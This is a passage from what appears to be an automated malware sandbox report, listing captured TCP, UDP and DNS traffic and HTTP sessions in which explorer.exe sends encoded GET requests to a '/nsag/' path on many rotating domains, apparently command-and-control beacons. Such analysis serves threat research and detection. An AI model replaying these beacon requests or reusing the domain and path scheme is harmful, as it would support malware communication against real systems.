                                                                              Mar 24, 2021 09:19:52.567348957 CET8049706213.32.49.255192.168.2.5
                                                                              Mar 24, 2021 09:19:52.567547083 CET4970680192.168.2.5213.32.49.255
                                                                              Mar 24, 2021 09:19:52.567842960 CET4970680192.168.2.5213.32.49.255
                                                                              Mar 24, 2021 09:19:52.593702078 CET8049706213.32.49.255192.168.2.5
                                                                              Mar 24, 2021 09:19:52.594542980 CET8049706213.32.49.255192.168.2.5
                                                                              Mar 24, 2021 09:19:52.594574928 CET8049706213.32.49.255192.168.2.5
                                                                              Mar 24, 2021 09:19:52.594784975 CET4970680192.168.2.5213.32.49.255
                                                                              Mar 24, 2021 09:19:52.594876051 CET4970680192.168.2.5213.32.49.255
                                                                              Mar 24, 2021 09:19:52.621098042 CET8049706213.32.49.255192.168.2.5
                                                                              Mar 24, 2021 09:19:57.636859894 CET4970780192.168.2.534.102.136.180
                                                                              Mar 24, 2021 09:19:57.649442911 CET804970734.102.136.180192.168.2.5
                                                                              Mar 24, 2021 09:19:57.649633884 CET4970780192.168.2.534.102.136.180
                                                                              Mar 24, 2021 09:19:57.649820089 CET4970780192.168.2.534.102.136.180
                                                                              Mar 24, 2021 09:19:57.662132978 CET804970734.102.136.180192.168.2.5
                                                                              Mar 24, 2021 09:19:57.766073942 CET804970734.102.136.180192.168.2.5
                                                                              Mar 24, 2021 09:19:57.766191959 CET804970734.102.136.180192.168.2.5
                                                                              Mar 24, 2021 09:19:57.766252995 CET4970780192.168.2.534.102.136.180
                                                                              Mar 24, 2021 09:19:57.766334057 CET4970780192.168.2.534.102.136.180
                                                                              Mar 24, 2021 09:19:57.780256033 CET804970734.102.136.180192.168.2.5
                                                                              Mar 24, 2021 09:20:12.821525097 CET4970880192.168.2.5155.133.132.7
                                                                              Mar 24, 2021 09:20:12.851718903 CET8049708155.133.132.7192.168.2.5
                                                                              Mar 24, 2021 09:20:12.851911068 CET4970880192.168.2.5155.133.132.7
                                                                              Mar 24, 2021 09:20:12.851944923 CET4970880192.168.2.5155.133.132.7
                                                                              Mar 24, 2021 09:20:12.879914045 CET8049708155.133.132.7192.168.2.5
                                                                              Mar 24, 2021 09:20:12.880697012 CET8049708155.133.132.7192.168.2.5
                                                                              Mar 24, 2021 09:20:12.880882025 CET4970880192.168.2.5155.133.132.7
                                                                              Mar 24, 2021 09:20:12.880903959 CET4970880192.168.2.5155.133.132.7
                                                                              Mar 24, 2021 09:20:12.909286976 CET8049708155.133.132.7192.168.2.5

                                                                              UDP Packets

                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Mar 24, 2021 09:17:52.367381096 CET5116553192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:17:52.379486084 CET53511658.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:17:52.449884892 CET5318353192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:17:52.462692976 CET53531838.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:17:58.003710032 CET5758753192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:17:58.016403913 CET53575878.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:07.329101086 CET5543253192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:07.342442036 CET53554328.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:18.839487076 CET6493653192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:18.852277040 CET53649368.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:19.872478962 CET5270453192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:19.891555071 CET53527048.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:20.434725046 CET5221253192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:20.448357105 CET53522128.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:38.032432079 CET5430253192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:38.045188904 CET53543028.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:40.047128916 CET5378453192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:40.060511112 CET53537848.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:41.987051010 CET6530753192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:41.999778986 CET53653078.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:43.649175882 CET6434453192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:43.686249971 CET53643448.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:43.777523041 CET6206053192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:43.792121887 CET53620608.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:44.849647999 CET6180553192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:44.865360975 CET53618058.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:48.709855080 CET5479553192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:48.811364889 CET53547958.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:54.010144949 CET4955753192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:54.038918972 CET53495578.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:18:59.204128981 CET6173353192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:18:59.225717068 CET53617338.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:04.246190071 CET6544753192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:04.266597033 CET53654478.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:09.416987896 CET5244153192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:09.440782070 CET53524418.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:14.673449039 CET6217653192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:14.686347961 CET53621768.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:19.791179895 CET5959653192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:19.821960926 CET53595968.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:24.901375055 CET6529653192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:24.941737890 CET53652968.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:30.109636068 CET6318353192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:30.130386114 CET53631838.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:35.182185888 CET6015153192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:35.314923048 CET53601518.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:40.545586109 CET5696953192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:40.722568989 CET53569698.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:42.890537977 CET5516153192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:42.906994104 CET53551618.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:47.357178926 CET5475753192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:47.389712095 CET53547578.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:52.459554911 CET4999253192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:52.539438009 CET53499928.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:19:57.607084036 CET6007553192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:19:57.635047913 CET53600758.8.8.8192.168.2.5
                                                                              Mar 24, 2021 09:20:07.794289112 CET5501653192.168.2.58.8.8.8
                                                                              Mar 24, 2021 09:20:07.807121992 CET53550168.8.8.8192.168.2.5

                                                                              DNS Queries

                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                              Mar 24, 2021 09:18:43.649175882 CET192.168.2.58.8.8.80xe8a0Standard query (0)www.ithacapella.comA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:18:48.709855080 CET192.168.2.58.8.8.80x8635Standard query (0)www.mecs.clubA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:18:54.010144949 CET192.168.2.58.8.8.80x3631Standard query (0)www.thefamilyorchard.netA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:18:59.204128981 CET192.168.2.58.8.8.80xb3ddStandard query (0)www.856380692.xyzA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:04.246190071 CET192.168.2.58.8.8.80x6416Standard query (0)www.dccheavydutydiv.netA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:09.416987896 CET192.168.2.58.8.8.80xaab1Standard query (0)www.worldsourcecloud.comA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:14.673449039 CET192.168.2.58.8.8.80x993eStandard query (0)www.icepolo.comA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:19.791179895 CET192.168.2.58.8.8.80xd812Standard query (0)www.explorerthecity.comA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:24.901375055 CET192.168.2.58.8.8.80xb500Standard query (0)www.winabeel.comA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.109636068 CET192.168.2.58.8.8.80x9591Standard query (0)www.alpinevalleytimeshares.comA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:35.182185888 CET192.168.2.58.8.8.80x802fStandard query (0)www.krishnagiri.infoA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:40.545586109 CET192.168.2.58.8.8.80x27c4Standard query (0)www.11376.xyzA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:42.890537977 CET192.168.2.58.8.8.80xde3dStandard query (0)www.11376.xyzA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:47.357178926 CET192.168.2.58.8.8.80x81c8Standard query (0)www.profirma-nachfolge.comA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:52.459554911 CET192.168.2.58.8.8.80xf32Standard query (0)www.meow-cafe.comA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:57.607084036 CET192.168.2.58.8.8.80xbb81Standard query (0)www.xfixpros.comA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:20:07.794289112 CET192.168.2.58.8.8.80x5b3cStandard query (0)www.ithacapella.comA (IP address)IN (0x0001)

                                                                              DNS Answers

                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                              Mar 24, 2021 09:18:43.686249971 CET8.8.8.8192.168.2.50xe8a0Name error (3)www.ithacapella.comnonenoneA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:18:48.811364889 CET8.8.8.8192.168.2.50x8635No error (0)www.mecs.clubwebacc5.sd3.ghst.netCNAME (Canonical name)IN (0x0001)
                                                                              Mar 24, 2021 09:18:48.811364889 CET8.8.8.8192.168.2.50x8635No error (0)webacc5.sd3.ghst.net155.133.132.7A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:18:54.038918972 CET8.8.8.8192.168.2.50x3631No error (0)www.thefamilyorchard.netthefamilyorchard.netCNAME (Canonical name)IN (0x0001)
                                                                              Mar 24, 2021 09:18:54.038918972 CET8.8.8.8192.168.2.50x3631No error (0)thefamilyorchard.net34.102.136.180A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:18:59.225717068 CET8.8.8.8192.168.2.50xb3ddName error (3)www.856380692.xyznonenoneA (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:04.266597033 CET8.8.8.8192.168.2.50x6416No error (0)www.dccheavydutydiv.netdccheavydutydiv.netCNAME (Canonical name)IN (0x0001)
                                                                              Mar 24, 2021 09:19:04.266597033 CET8.8.8.8192.168.2.50x6416No error (0)dccheavydutydiv.net34.102.136.180A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:09.440782070 CET8.8.8.8192.168.2.50xaab1No error (0)www.worldsourcecloud.com172.67.223.7A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:09.440782070 CET8.8.8.8192.168.2.50xaab1No error (0)www.worldsourcecloud.com104.21.78.148A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:14.686347961 CET8.8.8.8192.168.2.50x993eNo error (0)www.icepolo.com64.190.62.111A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:19.821960926 CET8.8.8.8192.168.2.50xd812No error (0)www.explorerthecity.com91.195.240.94A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:24.941737890 CET8.8.8.8192.168.2.50xb500No error (0)www.winabeel.comwinabeel.comCNAME (Canonical name)IN (0x0001)
                                                                              Mar 24, 2021 09:19:24.941737890 CET8.8.8.8192.168.2.50xb500No error (0)winabeel.com34.102.136.180A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)www.alpinevalleytimeshares.commarketsites.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)marketsites.namesilo.comparking.namesilo.comCNAME (Canonical name)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com188.164.131.200A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com198.251.84.92A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com70.39.125.244A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com45.58.190.82A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com192.161.187.200A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com198.251.81.30A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com204.188.203.155A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com209.141.38.71A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com168.235.88.209A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com64.32.22.102A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:30.130386114 CET8.8.8.8192.168.2.50x9591No error (0)parking.namesilo.com107.161.23.204A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:35.314923048 CET8.8.8.8192.168.2.50x802fNo error (0)www.krishnagiri.info199.59.242.153A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:40.722568989 CET8.8.8.8192.168.2.50x27c4No error (0)www.11376.xyz23.101.8.193A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:42.906994104 CET8.8.8.8192.168.2.50xde3dNo error (0)www.11376.xyz23.101.8.193A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:47.389712095 CET8.8.8.8192.168.2.50x81c8No error (0)www.profirma-nachfolge.com217.160.0.69A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:52.539438009 CET8.8.8.8192.168.2.50xf32No error (0)www.meow-cafe.com213.32.49.255A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:19:57.635047913 CET8.8.8.8192.168.2.50xbb81No error (0)www.xfixpros.comxfixpros.comCNAME (Canonical name)IN (0x0001)
                                                                              Mar 24, 2021 09:19:57.635047913 CET8.8.8.8192.168.2.50xbb81No error (0)xfixpros.com34.102.136.180A (IP address)IN (0x0001)
                                                                              Mar 24, 2021 09:20:07.807121992 CET8.8.8.8192.168.2.50x5b3cName error (3)www.ithacapella.comnonenoneA (IP address)IN (0x0001)

                                                                              HTTP Request Dependency Graph

                                                                              • www.mecs.club
                                                                              • www.thefamilyorchard.net
                                                                              • www.dccheavydutydiv.net
                                                                              • www.worldsourcecloud.com
                                                                              • www.icepolo.com
                                                                              • www.explorerthecity.com
                                                                              • www.winabeel.com
                                                                              • www.alpinevalleytimeshares.com
                                                                              • www.krishnagiri.info
                                                                              • www.profirma-nachfolge.com
                                                                              • www.meow-cafe.com
                                                                              • www.xfixpros.com

                                                                              HTTP Packets

                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              0192.168.2.549694155.133.132.780C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:18:48.846627951 CET310OUTGET /nsag/?AjU=0eG3A+xdiTlSChflywEKXt4QE5sc4N54SGCNaNShv/sJg/KK4GWzQn3UfuFvWFAkrsnB&njndiL=9rtTFPBhfVt4 HTTP/1.1
                                                                              Host: www.mecs.club
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:18:48.875091076 CET310INHTTP/1.1 301 Moved Permanently
                                                                              Date: Wed, 24 Mar 2021 08:18:48 GMT
                                                                              Server: Varnish
                                                                              Location: https://www.mecs.club/nsag/?AjU=0eG3A+xdiTlSChflywEKXt4QE5sc4N54SGCNaNShv/sJg/KK4GWzQn3UfuFvWFAkrsnB&njndiL=9rtTFPBhfVt4
                                                                              Content-Length: 0
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              1192.168.2.54969534.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:18:54.052807093 CET311OUTGET /nsag/?njndiL=9rtTFPBhfVt4&AjU=h6chZX6X/XLm5iLfNnjSQiLwIxpO4AXhRFvpVd8LzBeViFHgnZdEmcbaH/HW0orCWGB5 HTTP/1.1
                                                                              Host: www.thefamilyorchard.net
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:18:54.168734074 CET311INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Wed, 24 Mar 2021 08:18:54 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "605504c2-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              10192.168.2.549706213.32.49.25580C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:19:52.567842960 CET350OUTGET /nsag/?AjU=IhldT5wJOWXugkoAiz0IGMqIRU2spNDmcqQlMhwJn5b9F51tDlQqNKQjjCxGsZbl2k8T&njndiL=9rtTFPBhfVt4 HTTP/1.1
                                                                              Host: www.meow-cafe.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:19:52.594542980 CET351INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.18.0
                                                                              Date: Wed, 24 Mar 2021 08:19:52 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Content-Length: 339
                                                                              Connection: close
                                                                              Vary: Accept-Encoding
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 36 20 28 55 6e 69 78 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 30 2e 32 6b 2d 66 69 70 73 20 6d 6f 64 5f 66 63 67 69 64 2f 32 2e 33 2e 39 20 6d 6f 64 5f 77 73 67 69 2f 34 2e 36 2e 34 20 50 79 74 68 6f 6e 2f 33 2e 36 20 53 65 72 76 65 72 20 61 74 20 77 77 77 2e 6d 65 6f 77 2d 63 61 66 65 2e 63 6f 6d 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.46 (Unix) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 mod_wsgi/4.6.4 Python/3.6 Server at www.meow-cafe.com Port 80</address></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              11192.168.2.54970734.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:19:57.649820089 CET352OUTGET /nsag/?njndiL=9rtTFPBhfVt4&AjU=0fYIS8WhXSxnYSZx49570oVA3n8WHaW+EQaYVe4dO/i7L9H5e7C2DZIsfkO/ud7yRbP0 HTTP/1.1
                                                                              Host: www.xfixpros.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:19:57.766073942 CET352INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Wed, 24 Mar 2021 08:19:57 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "605504a9-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              12192.168.2.549708155.133.132.780C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:20:12.851944923 CET353OUTGET /nsag/?AjU=0eG3A+xdiTlSChflywEKXt4QE5sc4N54SGCNaNShv/sJg/KK4GWzQn3UfuFvWFAkrsnB&njndiL=9rtTFPBhfVt4 HTTP/1.1
                                                                              Host: www.mecs.club
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:20:12.880697012 CET353INHTTP/1.1 301 Moved Permanently
                                                                              Date: Wed, 24 Mar 2021 08:20:12 GMT
                                                                              Server: Varnish
                                                                              Location: https://www.mecs.club/nsag/?AjU=0eG3A+xdiTlSChflywEKXt4QE5sc4N54SGCNaNShv/sJg/KK4GWzQn3UfuFvWFAkrsnB&njndiL=9rtTFPBhfVt4
                                                                              Content-Length: 0
                                                                              Connection: close


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              2192.168.2.54969634.102.136.18080C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:19:04.281327963 CET312OUTGET /nsag/?njndiL=9rtTFPBhfVt4&AjU=7cP8xnb8WyCvwLiClb+mYodtMUI7w/zEY/AqgyK4ue3XLBeWVzU6LHeJbcAyXLM59Zs/ HTTP/1.1
                                                                              Host: www.dccheavydutydiv.net
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:19:04.397773027 CET313INHTTP/1.1 403 Forbidden
                                                                              Server: openresty
                                                                              Date: Wed, 24 Mar 2021 08:19:04 GMT
                                                                              Content-Type: text/html
                                                                              Content-Length: 275
                                                                              ETag: "605504c2-113"
                                                                              Via: 1.1 google
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                              3192.168.2.549697172.67.223.780C:\Windows\explorer.exe
                                                                              TimestampkBytes transferredDirectionData
                                                                              Mar 24, 2021 09:19:09.475511074 CET314OUTGET /nsag/?AjU=B6Y2gXStMnwX5XGKVuP/TmarUdW4V+m6LGGQinzk50iDzibEzn0GLWf4ECTuyrFUZI2G&njndiL=9rtTFPBhfVt4 HTTP/1.1
                                                                              Host: www.worldsourcecloud.com
                                                                              Connection: close
                                                                              Data Raw: 00 00 00 00 00 00 00
                                                                              Data Ascii:
                                                                              Mar 24, 2021 09:19:09.610802889 CET315INHTTP/1.1 403 Forbidden
                                                                              Date: Wed, 24 Mar 2021 08:19:09 GMT
                                                                              Content-Type: text/html
